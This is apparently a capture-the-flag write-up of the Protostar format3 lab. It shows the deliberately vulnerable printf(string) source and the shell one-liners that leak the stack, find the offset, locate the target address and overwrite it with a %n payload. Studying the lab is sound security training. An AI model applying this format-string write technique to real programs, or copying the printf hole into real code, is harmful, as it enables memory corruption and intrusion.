I love to test Format String vulnerable because it fun. Let’s get start.
Description
This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.
Format3.c
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void printbuffer(char *string) { printf(string); } void vuln() { char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printbuffer(buffer); if(target == 0x01025544) { printf("you have modified the target :)\n"); } else { printf("target is %08x :(\n", target); } } int main(int argc, char **argv) { vuln(); }
In this task,we need to change the value 0x01025544 of target variable.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "%08x"')) | ./format3 00000000 target is 00000000 :(
Test with input value (AAAA)
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format3 AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78. target is 00000000 :(
41414141 is locate on 12 😀 .
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%12$08x."')) | ./format3 AAAA41414141. target is 00000000 :(
Pretty Good!. Let’s change the value but we need to get the address of target variable. so we can use objdump
[email protected]:/opt/protostar/bin$ objdump -t ./format3 | grep target 080496f4 g O .bss 00000004 target
Exploit it
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%12$08n"')) | ./format3 �� target is 00000004 :(
Target is 4 but we need to change another flag value. we can use let command to get the length.
[email protected]:/opt/protostar/bin$ let x=0x01025544; echo $x; 16930116
Need to remove 4 bytes AAAA 16930116 – 4 and use %u for hex.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%16930112u"+"%12$08n"')) | ./format3
Bango! We got it! Thanks for reading. Happy Hacking.